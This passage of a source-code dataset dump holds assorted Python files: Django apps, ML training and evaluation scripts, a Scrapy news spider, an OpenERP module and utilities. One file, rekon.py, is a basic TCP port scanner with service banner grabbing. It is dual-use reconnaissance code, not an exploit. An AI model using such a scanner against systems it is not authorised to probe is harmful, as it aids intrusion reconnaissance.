read_training_files( ) == '':\n sys.exit()\n\n inp = input(\">> Enter context word or blank to get next sentence ('.' to end) : \")\n synonyms = []\n max_loops = 20\n \n while inp != '.':\n sentence = markov_get_line(nkey=start_key)\n if inp:\n # get synonyms (and their synonyms) for the context entered by user \n synonyms += [inp]\n # PyDictionary returns None when it finds no synonyms\n synonyms += dix.synonym(inp) or []\n synonyms1 = synonyms\n for w in synonyms1[1:]:\n # Cannot get synonym for phrase, skip phrase\n if w.rfind(' ') == -1:\n synonyms += dix.synonym(w) or []\n # check to see if the sentence matches any of the context\n while any( word in map(str.lower, sentence.split()) for word in synonyms) == False and max_loops:\n sentence = markov_get_line(nkey=start_key)\n max_loops -= 1\n if max_loops == 0:\n print(\">> Could not get sentence with context for\", synonyms)\n max_loops = 20\n else:\n print(sentence)\n print(\">> Context/Synonyms:\", synonyms)\n synonyms = []\n inp = input(\">> Enter context word or blank to get next sentence ('.' to end) : \")\n","sub_path":"contextgen/markovtextgen.py","file_name":"markovtextgen.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"399121058","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = \"login\"\n\nurlpatterns = [\n url(r'^$', views.index, name = 'index'),\n url(r'dologin/$', views.dologin, name = \"dologin\"),\n url(r'doregister/$', views.doregister, name = \"doregister\"),\n url(r'register/$', views.register, name = \"register\"),\n \n]\n","sub_path":"login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"604888235","text":"from collections import defaultdict\nimport toolz as fp\n\nclass ZeroDict(dict):\n\n def __init__(self):\n super(self.__class__, self).__init__()\n self._maxval = 0\n self._sum = 0\n\n def __getitem__(self, key):\n return self.get(key, 0)\n\n def __setitem__(self, key, value):\n old_val = self[key]\n super(self.__class__, self).__setitem__(key, value)\n if value > self._maxval:\n self._maxval = value\n self._sum = self._sum - old_val + value\n\n @property\n def maxval(self):\n return self._maxval\n\n @property\n def sumval(self):\n return self._sum\n\nclass Node(object):\n '''Node in the LOMtree algorithm'''\n\n node_number = -1\n\n def __init__(self, node=None):\n '''\n Corresponds to the 'SetNode' subroutine from the paper\n :return:\n '''\n if node is None:\n # bump the class-level counter so each fresh node gets its own id;\n # writing self.node_number would shadow it with an instance attribute\n Node.node_number += 1\n self.node_id = Node.node_number\n self.regressor = None\n else:\n self.node_id = node.node_id\n self.regressor = node.regressor\n self.m = ZeroDict()\n self.l = ZeroDict()\n self.n = ZeroDict()\n self.e = ZeroDict()\n self.E = 0.\n self.C = 0\n self.parent = None\n self.left = None\n self.right = None\n\n def __hash__(self):\n return hash(self.node_id)\n\n @property\n def is_leaf(self):\n if self.left is None and self.right is None:\n return True\n else:\n return False\n\n def new_children(self, regressor):\n if self.regressor is None:\n self.regressor = regressor\n left = Node()\n right = Node()\n left.parent = self\n right.parent = self\n self.left = left\n self.right = right\n return left, right","sub_path":"src/python/pylsc/LOMtree/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
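A minimal usage sketch for the ZeroDict/Node record above — illustrative only, not part of the dataset, and the keys and values are made up. It shows the bookkeeping the class maintains: missing keys read as 0, sumval tracks the running total across overwrites, and maxval is monotone (it remembers the largest value ever stored, so it does not drop when a key is overwritten with something smaller).

    zd = ZeroDict()
    zd['a'] = 3              # sum = 3, max = 3
    zd['b'] = 5              # sum = 8, max = 5
    zd['b'] = 2              # overwrite: sum = 8 - 5 + 2 = 5; max stays at 5
    assert zd['missing'] == 0
    assert zd.sumval == 5 and zd.maxval == 5

    root = Node()
    left, right = root.new_children(regressor=None)
    assert left.parent is root and not root.is_leaf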
+{"seq_id":"638898634","text":"import numpy as np\n\n\ndef inference(w, b, x_list):\n\n return np.array(x_list) * w + b\n\n\ndef eval_loss(predict_y_list, y_list):\n p_y_list = np.array(predict_y_list)\n gt_y_list = np.array(y_list)\n return np.dot(np.transpose(p_y_list - gt_y_list), np.array(p_y_list - gt_y_list)) / len(y_list)\n\n\ndef gradient(predict_y, gt_y, x):\n diff = predict_y - gt_y\n\n dw = diff * x\n db = diff\n\n return dw, db\n\n\ndef batch_gradient(predict_y_list, gt_y_list, x_list, w, b, lr):\n\n batch_size = len(x_list)\n\n diff = np.array(predict_y_list) - np.array(gt_y_list)\n avg_dw = np.sum(np.multiply(diff, np.array(x_list))) / batch_size\n avg_db = np.sum(diff) / batch_size\n\n w -= lr * avg_dw\n b -= lr * avg_db\n return w, b\n\n\ndef train(x_list, gt_y_list, batch_size, lr, max_iter):\n\n w = 0\n b = 0\n\n for i in range(max_iter):\n indexes = np.random.choice(len(x_list), batch_size)\n\n batch_x_list = [x_list[j] for j in indexes]\n batch_y_list = [gt_y_list[j] for j in indexes]\n\n batch_predict_y_list = inference(w, b, batch_x_list)\n\n loss = eval_loss(batch_predict_y_list, batch_y_list)\n\n w, b = batch_gradient(batch_predict_y_list, batch_y_list, batch_x_list, w, b, lr)\n\n print('w: {}, b: {}'.format(w, b))\n print('loss: {}'.format(loss))\n\n return w, b\n\n\ndef gen_sample_data():\n w = np.random.randint(0, 10) + np.random.random()\t\t# for noise random.random[0, 1)\n b = np.random.randint(0, 5) + np.random.random()\n num_samples = 10000\n x_list = []\n y_list = []\n for i in range(num_samples):\n x = np.random.randint(0, 100) * np.random.random()\n y = w * x + b + np.random.random() * np.random.randint(-1, 1)\n x_list.append(x)\n y_list.append(y)\n return x_list, y_list, w, b\n\n\ndef run():\n x_list, y_list, w, b = gen_sample_data()\n lr = 0.001\n max_iter = 10000\n train(x_list, y_list, 2000, lr, max_iter)\n\n print('Final w: {}, b: {}'.format(w, b))\n\n\nif __name__ == '__main__':\n import time\n start = time.time()\n run()\n end = time.time()\n\n print('Total time used: {}'.format(end - start))\n","sub_path":"python/week3/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"652509464","text":"import peewee\nfrom cerberus import ValidationError, Validator, errors\n\nfrom ban import db\nfrom postgis import Point\n\n\nclass ResourceValidator(Validator):\n\n ValidationError = ValidationError\n\n def __init__(self, model, *args, **kwargs):\n self.model = model\n kwargs['purge_unknown'] = True\n super().__init__(model._meta.resource_schema, *args, **kwargs)\n\n def _validate_type_point(self, field, value):\n if not isinstance(value, (str, list, tuple, Point)):\n self._error(field, 'Invalid Point: {}'.format(value))\n\n def _validate_unique(self, unique, field, value):\n qs = self.model.select()\n attr = getattr(self.model, field)\n qs = qs.where(attr == value)\n if self.instance:\n qs = qs.where(self.model.id != self.instance.id)\n if qs.exists():\n self._error(field, 'Duplicate value for {}: {}'.format(field,\n value))\n\n def _validate_coerce(self, coerce, field, value):\n # See https://github.com/nicolaiarocci/cerberus/issues/171.\n try:\n value = coerce(value)\n except (TypeError, ValueError, peewee.DoesNotExist):\n self._error(field, errors.ERROR_COERCION_FAILED.format(field))\n return value\n\n def validate(self, data, instance=None, **kwargs):\n self.instance = instance\n super().validate(data, 
**kwargs)\n if ('version' in self.schema and instance\n and not self.document.get('version')):\n self._error('version', errors.ERROR_REQUIRED_FIELD)\n\n def save(self):\n if self.errors:\n raise ValidationError('Invalid document')\n if self.instance:\n for key, value in self.document.items():\n setattr(self.instance, key, value)\n self.instance.save()\n else:\n m2m = {}\n data = {}\n for key, value in self.document.items():\n field = getattr(self.model, key)\n if isinstance(field, db.ManyToManyField):\n m2m[key] = value\n else:\n data[key] = value\n self.instance = self.model.create(**data)\n # m2m need the instance to be saved.\n for key, value in m2m.items():\n setattr(self.instance, key, value)\n return self.instance\n\n\nclass ResourceQueryResultWrapper(peewee.ModelQueryResultWrapper):\n\n def process_row(self, row):\n instance = super().process_row(row)\n return instance.as_resource\n\n\nclass ResourceListQueryResultWrapper(peewee.ModelQueryResultWrapper):\n\n def process_row(self, row):\n instance = super().process_row(row)\n return instance.as_list\n\n\nclass SelectQuery(db.SelectQuery):\n\n @peewee.returns_clone\n def as_resource(self):\n self._result_wrapper = ResourceQueryResultWrapper\n\n @peewee.returns_clone\n def as_resource_list(self):\n self._result_wrapper = ResourceListQueryResultWrapper\n\n\nclass BaseResource(peewee.BaseModel):\n\n def __new__(mcs, name, bases, attrs, **kwargs):\n # Inherit and extend instead of replacing.\n resource_fields = attrs.pop('resource_fields', None)\n cls = super().__new__(mcs, name, bases, attrs, **kwargs)\n if resource_fields is not None:\n inherited = getattr(cls, 'resource_fields', None)\n if inherited:\n resource_fields.extend(inherited)\n cls.resource_fields = resource_fields\n cls.fields_for_resource = cls.resource_fields\n cls.fields_for_relation = [\n n for n in cls.fields_for_resource\n if not isinstance(getattr(cls, n, None), db.ManyToManyField)\n and not n == 'version']\n cls.fields_for_list = cls.fields_for_relation + ['resource']\n cls._meta.resource_schema = cls.build_resource_schema()\n return cls\n\n\nclass ResourceModel(db.Model, metaclass=BaseResource):\n resource_fields = ['id']\n identifiers = []\n\n class Meta:\n abstract = True\n resource_schema = {}\n manager = SelectQuery\n\n @classmethod\n def build_resource_schema(cls):\n schema = {}\n for name, field in cls._meta.fields.items():\n if name not in cls.fields_for_resource:\n continue\n if field.primary_key:\n continue\n type_ = getattr(field.__class__, 'schema_type', None)\n if not type_:\n continue\n row = {\n 'type': type_,\n 'required': not field.null,\n 'coerce': field.coerce,\n }\n if field.unique:\n row['unique'] = True\n max_length = getattr(field, 'max_length', None)\n if max_length:\n row['maxlength'] = max_length\n if not field.null:\n row['empty'] = False\n row.update(cls._meta.resource_schema.get(name, {}))\n schema[name] = row\n return schema\n\n @classmethod\n def validator(cls, instance=None, update=False, **data):\n validator = ResourceValidator(cls)\n validator(data, update=update, instance=instance)\n return validator\n\n @property\n def resource(self):\n return self.__class__.__name__.lower()\n\n @property\n def as_resource(self):\n return {f: self.as_resource_field(f) for f in self.fields_for_resource}\n\n @property\n def as_list(self):\n return {f: self.as_list_field(f) for f in self.fields_for_list}\n\n @property\n def as_relation(self):\n return {f: self.as_relation_field(f) for f in self.fields_for_relation}\n\n def as_resource_field(self, 
name):\n value = getattr(self, '{}_resource'.format(name), getattr(self, name))\n return getattr(value, 'as_relation', value)\n\n def as_relation_field(self, name):\n value = getattr(self, name)\n return getattr(value, 'id', value)\n\n def as_list_field(self, name):\n value = getattr(self, '{}_resource'.format(name), getattr(self, name))\n return getattr(value, 'id', value)\n\n @classmethod\n def coerce(cls, id, identifier=None):\n if not identifier:\n identifier = 'id'\n if isinstance(id, str):\n *extra, id = id.split(':')\n if extra:\n identifier = extra[0]\n if identifier not in cls.identifiers + ['id']:\n raise cls.DoesNotExist(\"Invalid identifier {}\".format(\n identifier))\n try:\n return cls.get(getattr(cls, identifier) == id)\n except cls.DoesNotExist:\n # Is it an old identifier?\n from .versioning import IdentifierRedirect\n new = IdentifierRedirect.follow(cls, identifier, id)\n if new:\n return cls.get(getattr(cls, identifier) == new)\n else:\n raise\n","sub_path":"ban/core/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":7015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"12554192","text":"import socket\nimport os\nimport sys\nimport argparse\nfrom time import sleep\nimport http.client\n\nwait = 1\ndelay = 0\nbanner = 0\n\n\ndef remove_control_chars(s):\n # strip unprintable control characters out of a raw banner string\n return ''.join(ch for ch in s if ch.isprintable())\n\n\ndef printRes(response, ip, port):\n if response:\n if response == 111:\n print (ip + \"\\t%d\\tClosed\" %port)\n else: \n print (ip + \"\\t%d\\tFiltered\" %port)\n else:\n if banner:\n print ((ip + \"\\t%d\\tOpen\" %port) + \"\\tBanner:\")\n print (\"\\t\\t\\t\\t\"+ bannerGrab(ip, port))\n else:\n print (ip + \"\\t%d\\tOpen\" %port) \n\ndef TCPScan(ip, port):\n s = socket.socket() \n global delay, wait\n # the configurable wait decides when a port is reported as filtered\n s.settimeout(wait)\n response = s.connect_ex((ip, port)) \n printRes(response, ip, port)\n sleep(delay)\n s.close()\n\ndef bannerGrab(ip, port):\n try:\n conn = http.client.HTTPConnection(ip, port)\n conn.request(\"GET\", \"/\")\n res = conn.getresponse()\n banner = str(res.getheaders()).lower()\n final = \"\"\n if \"server\" in banner:\n banner2=banner[banner.find(\"server\"):]\n banner2=banner2[10:banner2.find(\"')\")]\n if len(banner2) > 1:\n final += \"Server: \" + banner2\n if \"powered-by\" in banner:\n banner3=banner[banner.find(\"powered-by\"):]\n banner3=banner3[14:banner3.find(\"')\")]\n if len(banner3) > 1:\n final += banner3\n if len(final) > 1:\n return final\n except: \n pass \n try:\n s=socket.socket() \n s.settimeout(2)\n s.connect((ip,port)) \n banner = \"\"\n try:\n banner = str(s.recv(4096)).replace(\"\\r\", \"\").replace(\"\\n\", \"\") \n print(banner)\n if len(banner) > 5:\n return remove_control_chars(banner)\n except Exception as e:\n print (str(e))\n try:\n s.sendall(\"\\n\".encode(\"utf-8\"))\n banner = str(s.recv(4096)).replace(\"\\r\", \"\").replace(\"\\n\", \"\") \n s.close()\n if len(banner) > 5:\n return remove_control_chars(banner) \n except Exception as e: \n print (str(e))\n \n except Exception as e: \n print (str(e))\n return \"No Banner Found\" \n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", help=\"ip address/range to scan\")\nparser.add_argument(\"-p\", help=\"ports to scan\")\nparser.add_argument(\"-d\", help=\"sets the delay time between ports\")\nparser.add_argument(\"-b\", help=\"obtain banner\", action=\"store_true\")\nparser.add_argument(\"-w\", help=\"sets the max wait time for a response, before the port is considered to be filtered\")\nargs = parser.parse_args()\n\nif args.b:\n banner = 1 \n\n# honor the -d (delay) and -w (timeout) options when provided\nif args.d is not None:\n delay = float(args.d)\nif args.w is not None:\n wait = float(args.w)\n\nif args.i is not 
None:\n ip = args.i\n ports = args.p\n print(\"Scanning \" +ip+ \" with ports \" + ports)\n TCPScan(ip,int(ports))\n\n\n\n","sub_path":"rekon.py","file_name":"rekon.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"631408628","text":"import unittest\nimport HTMLTestRunner\nimport os\nimport time\n#search方法\nclass Search():\n def search(self):\n print(\"search方法\")\nclass TestDemo(unittest.TestCase):\n #在每个方法的前执行\n def setUp(self) -> None:\n print(\"setup\")\n #在每个方法的后执行\n def tearDown(self) -> None:\n print(\"tearDown\")\n\n def test_search(self):\n print(\"search11111111111\")\n search = Search()\n search.search()\n def test_search1(self):\n print(\"search2222222222\")\n search = Search()\n search.search()\n\nif __name__ == '__main__':\n # unittest.main()\n suit = unittest.TestSuite()\n suit.addTest(TestDemo(\"test_search\"))\n suit.addTest(TestDemo(\"test_search1\"))\n # unittest.TextTestRunner().run(suit)\n report_path = os.path.join(os.path.dirname(__file__),'report')\n now = time.strftime(\"%Y-%m-%d %H_%M_%S\",time.localtime())\n filename = report_path+\"/\"+now+\"_result.html\"\n fname1 = \"wode.html\"\n with open(filename,'wb')as fp:\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, title=\"MyReport\", description='测试一下哈')\n runner.run(suit)","sub_path":"test_unittestdemo.py","file_name":"test_unittestdemo.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"10207723","text":"\"\"\"\nOpdracht 14 - Levensverwachting\nhttps://dodona.ugent.be/nl/exercises/849566952/\n\"\"\"\n\ndef berekenGeslacht(leeftijd, geslacht: str):\n if geslacht == 'man':\n return leeftijd\n else:\n leeftijd = leeftijd + 4\n return leeftijd\n\ndef berekenRoker(leeftijd, roker: bool):\n if roker == True:\n leeftijd = leeftijd - 5\n return leeftijd\n else:\n leeftijd = leeftijd + 5\n return leeftijd\n\ndef berekenSport(leeftijd, sport: int):\n if sport == 0:\n leeftijd = leeftijd - 3\n return leeftijd\n elif sport > 0:\n leeftijd = leeftijd + sport\n return leeftijd\n\ndef berekenAlcohol(leeftijd, alcohol: int):\n if alcohol == 0:\n leeftijd = leeftijd + 2\n return leeftijd\n elif alcohol <= 7:\n return leeftijd\n else:\n newAlcohol = (alcohol - 7) * 0.5\n leeftijd = leeftijd - newAlcohol\n return leeftijd\n\ndef berekenFastfood(leeftijd, fastfood: bool):\n if fastfood == True:\n return leeftijd\n else:\n leeftijd = leeftijd + 3\n return leeftijd\n\ndef levensverwachting(geslacht: str, roker: bool, sport: int, alcohol: int, fastfood: bool):\n leeftijd = 70\n leeftijd = berekenGeslacht(leeftijd, geslacht)\n leeftijd = berekenRoker(leeftijd, roker)\n leeftijd = berekenSport(leeftijd, sport)\n leeftijd = berekenAlcohol(leeftijd, alcohol)\n leeftijd = berekenFastfood(leeftijd, fastfood)\n print('%.1f' % leeftijd)\n\ndef main():\n levensverwachting(geslacht='man', roker=True, sport=2, alcohol=10, fastfood=True)\n levensverwachting(geslacht='man', roker=True, sport=5, alcohol=5, fastfood=True)\n levensverwachting(geslacht='vrouw', roker=False, sport=5, alcohol=0, fastfood=False)\n levensverwachting(geslacht='vrouw', roker=False, sport=3, alcohol=14, fastfood=True)\n levensverwachting(geslacht='man', roker=False, sport=4, alcohol=4, fastfood=False)\n\nif __name__ == '__main__':\n 
main()","sub_path":"week03/Levensverwachting.py","file_name":"Levensverwachting.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"34046932","text":"import json\n\nfrom django.contrib import admin\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models import F\nfrom django.db.models.functions import TruncDay\n\nfrom core.models import Food, Compatibility, Recommendation, Wall, Statistics\n\n\n@admin.register(Food)\nclass FoodAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'name',\n 'type',\n 'quantity',\n 'calories'\n )\n\n fields = ('name', 'type', 'quantity', 'calories', 'carbs', 'proteins', 'fat')\n\n\n@admin.register(Compatibility)\nclass CompatibilityAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'food1',\n 'food2',\n 'count'\n )\n\n fields = ('count', 'food1', 'food2')\n\n\n@admin.register(Statistics)\nclass StatisticsAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'day',\n 'food',\n 'amount'\n )\n\n fields = ('day', 'food', 'amount')\n\n def changelist_view(self, request, extra_context=None):\n chart_data = (\n Statistics.objects.annotate(date=TruncDay(\"day\"))\n .values(\"date\")\n .annotate(y=F(\"amount\"))\n .order_by(\"-date\")\n )\n\n as_json = json.dumps(list(chart_data), cls=DjangoJSONEncoder)\n extra_context = extra_context or {\"chart_data\": as_json}\n\n return super().changelist_view(request, extra_context=extra_context)\n\n\n@admin.register(Recommendation)\nclass RecommendationAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'recommend'\n )\n\n fields = ('recommend',)\n\n\n@admin.register(Wall)\nclass WallAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'user',\n 'statistics'\n )\n\n fields = ('user', 'statistics')\n readonly_fields = ('user',)\n","sub_path":"my_food/core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"462442757","text":"\nimport copy\n\nconfigs = dict()\n\nconfig = dict(\n agent=dict(),\n algo=dict(\n discount=0.99,\n learning_rate=3e-4,\n clip_grad_norm=1e6,\n entropy_loss_coeff=0.0,\n gae_lambda=0.95,\n minibatches=32,\n epochs=10,\n ratio_clip=0.2,\n normalize_advantage=True,\n linear_lr_schedule=True,\n ),\n env=dict(id=\"Hopper-v3\"),\n model=dict(),\n optim=dict(),\n runner=dict(\n n_steps=1e6,\n log_interval_steps=2048 * 10,\n ),\n sampler=dict(\n batch_T=2048,\n batch_B=1,\n max_decorrelation_steps=1000,\n ),\n)\n\nconfigs[\"ppo_1M_serial\"] = config","sub_path":"rlpyt/experiments/configs/mujoco/pg/mujoco_ppo.py","file_name":"mujoco_ppo.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"354713411","text":"import App\n\ndef CreateAI(pShip):\n\timport MissionLib\n\tpPlayer = MissionLib.GetPlayer()\n\t#########################################\n\t# Creating PlainAI FollowPlayer at (325, 106)\n\tpFollowPlayer = App.PlainAI_Create(pShip, \"FollowPlayer\")\n\tpFollowPlayer.SetScriptModule(\"FollowObject\")\n\tpFollowPlayer.SetInterruptable(1)\n\tpScript = pFollowPlayer.GetScriptInstance()\n\tpScript.SetFollowObjectName(pPlayer.GetName())\n\t# Done creating PlainAI FollowPlayer\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI FollowThroughWarp at (452, 116)\n\timport 
AI.Compound.FollowThroughWarp\n\tpFollowThroughWarp = AI.Compound.FollowThroughWarp.CreateAI(pShip, pPlayer.GetName(), FollowToSB12 = 1, FollowThroughMissions = 1)\n\t# Done creating CompoundAI FollowThroughWarp\n\t#########################################\n\t#########################################\n\t# Creating PriorityListAI PriorityList at (202, 170)\n\tpPriorityList = App.PriorityListAI_Create(pShip, \"PriorityList\")\n\tpPriorityList.SetInterruptable(1)\n\t# SeqBlock is at (376, 284)\n\tpPriorityList.AddAI(pFollowPlayer, 1)\n\tpPriorityList.AddAI(pFollowThroughWarp, 2)\n\t# Done creating PriorityListAI PriorityList\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI AvoidObstacles at (78, 219)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AvoidObstacles()\n\t## The PreprocessingAI:\n\tpAvoidObstacles = App.PreprocessingAI_Create(pShip, \"AvoidObstacles\")\n\tpAvoidObstacles.SetInterruptable(1)\n\tpAvoidObstacles.SetPreprocessingMethod(pScript, \"Update\")\n\tpAvoidObstacles.SetContainedAI(pPriorityList)\n\t# Done creating PreprocessingAI AvoidObstacles\n\t#########################################\n\treturn pAvoidObstacles\n","sub_path":"scripts/Custom/RandomEnc/ai/FollowAI.py","file_name":"FollowAI.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"292590000","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nplt.ion()\n\nimport Nowack_Lab.Utilities.save\n\nfrom Nowack_Lab.Utilities.save import Measurement\n\n\n\n\npath = '/labshare/data/spruce/experiments/2017-07-15_4k_scan/2017-07-16/'\nfilename = '2017-07-15_184250_Scanplane'\n\nscan = Measurement.load(path+filename)\n\nfig = plt.figure();\n\nax = plt.subplot(111, aspect='equal')\n\nimage = ax.imshow(scan.V['acy'], cmap='bwr', \n origin='lower',\n extent=[scan.X.min(), scan.X.max(),\n scan.Y.min(), scan.Y.max()])\nd = make_axes_locatable(ax)\ncax = d.append_axes('right', size=0.1, pad=0.1)\ncbar = plt.colorbar(image, cax=cax)\ncbar.set_label('AC X (V)')\nax.set_xlabel('X position (V)') \nax.set_ylabel('Y position (V)') \n","sub_path":"2017/07/18/plotscan.py","file_name":"plotscan.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"505656394","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nfrom baidunews.items import BaidunewsItem\nfrom scrapy.http import Request\n\nclass N1Spider(scrapy.Spider):\n name = 'n1'\n allowed_domains = ['baidu.com']\n start_urls = ['http://news.baidu.com/widget?id=LocalHouseNews&ajax=json']\n allid = ['LocalHouseNews', 'LocalNews', 'civilnews', 'InternationalNews', 'EnterNews', 'SportNews', 'FinanceNews',\n 'TechNews', 'MilitaryNews', 'InternetNews', 'DiscoveryNews', 'LadyNews', 'PicWall', 'HealthNews']\n allurl=[]\n for k in range(0, len(allid)):\n thisurl = \"http://news.baidu.com/widget?id=\" + allid[k] + \"&ajax=json\"\n allurl.append(thisurl)\n\n\n def parse(self, response):\n #print(self.allid)\n for m in range(0, len(self.allurl)):\n print(\"第\" + str(m) + \"个栏目\")\n yield Request(self.allurl[m], callback=self.next)\n\n def next(self, response):\n\n #thisid = self.allurl[j]\n #print(\"第\"+str(j)+\"个栏目\")\n data=response.body.decode(\"utf-8\", \"ignore\")\n pat1 = '\"m_relate_url\":\"(.*?)\"'\n pat2 = '\"url\":\"(.*?)\"'\n url1 = re.compile(pat1, 
re.S).findall(data)\n url2 = re.compile(pat2, re.S).findall(data)\n if(len(url1)!=0):\n url=url1\n\n else:\n url=url2\n print(url)\n for i in range(0,len(url)):\n thisurl = re.sub(\"\\\\\\/\",\"/\",url[i])\n print(thisurl)\n yield Request(thisurl, callback=self.next2)\n def next2(self, response):\n item = BaidunewsItem()\n item[\"link\"]=response.url\n item[\"title\"]=response.xpath(\"/html/head/title/text()\").extract()\n item[\"content\"]=response.body\n yield item\n","sub_path":"baidunews/baidunews/spiders/n1.py","file_name":"n1.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"340871422","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (c) 2010-2014 Elico Corp. All Rights Reserved.\n# Qing Wang \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\nfrom openerp.osv import osv\nfrom openerp import SUPERUSER_ID\n\n\nclass sale_order(osv.Model):\n _inherit = 'sale.order'\n\n # def _portal_payment_block(\n # self, cr, uid, ids, fieldname, arg, context=None):\n # result = dict.fromkeys(ids, False)\n # payment_acquirer = self.pool.get('portal.payment.acquirer')\n # for this in self.browse(cr, SUPERUSER_ID, ids, context=context):\n # if this.state not in ('draft', 'quotation', 'cancel')\\\n # and not this.invoiced:\n # result[this.id] = payment_acquirer.render_payment_block(\n # cr, uid, this, this.name,\n # this.pricelist_id.currency_id,\n # this.amount_total, context=context)\n # return result\n\n def _portal_payment_block(\n self, cr, uid, ids, fieldname, arg, context=None):\n result = dict.fromkeys(ids, False)\n payment_acquirer = self.pool['payment.acquirer']\n for this in self.browse(cr, SUPERUSER_ID, ids, context=context):\n if this.state not in ('draft', 'cancel') and not this.invoiced:\n result[this.id] = payment_acquirer.render_payment_block(\n cr, uid, this.name, this.amount_total, this.pricelist_id.currency_id.id,\n partner_id=this.partner_id.id, company_id=this.company_id.id, context=context)\n return result\n","sub_path":"portal_supplier_account/portal_sale.py","file_name":"portal_sale.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"541188436","text":"import argparse\nfrom keras.datasets import mnist, cifar10\nfrom utils import write_file\nfrom keras import utils\nfrom keras.models import load_model, Model\nimport numpy as np\nfrom utils import load_file\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.metrics import roc_auc_score\nfrom threshold_sa import get_correct_and_incorrect_instance, normalize_sa \n\nCLIP_MIN = -0.5\nCLIP_MAX = 
0.5\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--d\", \"-d\", help=\"Dataset\", type=str, default=\"mnist\")\n\n args = parser.parse_args()\n assert args.d in [\"mnist\", \"cifar\"], \"Dataset should be either 'mnist' or 'cifar'\" \n print(args)\n \n if args.d == 'cifar':\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\n \n x_train = x_train.astype(\"float32\")\n x_train = (x_train / 255.0) - (1.0 - CLIP_MAX)\n x_test = x_test.astype(\"float32\")\n x_test = (x_test / 255.0) - (1.0 - CLIP_MAX)\n\n # number of class\n num_class = 10\n y_train = utils.to_categorical(y_train, num_class)\n y_test = utils.to_categorical(y_test, num_class)\n\n model = load_model('./model_tracking/cifar_model_improvement-496-0.87.h5')\n model.summary()\n\n # # # # evaluate\n # # scores = model.evaluate(x_test, y_test, batch_size=128, verbose=1)\n # # print('\\nEvaluation result: %.3f loss: %.3f' % (scores[1]*100,scores[0]))\n # # exit()\n\n y_pred = model.predict(x_test)\n true_score = get_correct_and_incorrect_instance(y_pred=y_pred, y_true=y_test) \n \n y_conf = np.amax(y_pred, axis=1)\n fpr_conf, tpr_conf, _ = roc_curve(true_score, y_conf)\n roc_auc_conf = auc(fpr_conf, tpr_conf)\n\n y_lsa = load_file('./sa/lsa_%s.txt' % (args.d)) \n y_lsa = [-float(s) for s in y_lsa]\n fpr_lsa, tpr_lsa, _ = roc_curve(true_score, y_lsa)\n roc_auc_lsa = auc(fpr_lsa, tpr_lsa)\n\n y_dsa = load_file('./sa/dsa_%s.txt' % (args.d)) \n y_dsa = [-float(s) for s in y_dsa]\n fpr_dsa, tpr_dsa, _ = roc_curve(true_score, y_dsa)\n roc_auc_dsa = auc(fpr_dsa, tpr_dsa)\n\n # method I: plt\n import matplotlib.pyplot as plt\n plt.title('Receiver Operating Characteristic')\n plt.plot(fpr_conf, tpr_conf, 'b', label = 'AUC_conf = %0.2f' % 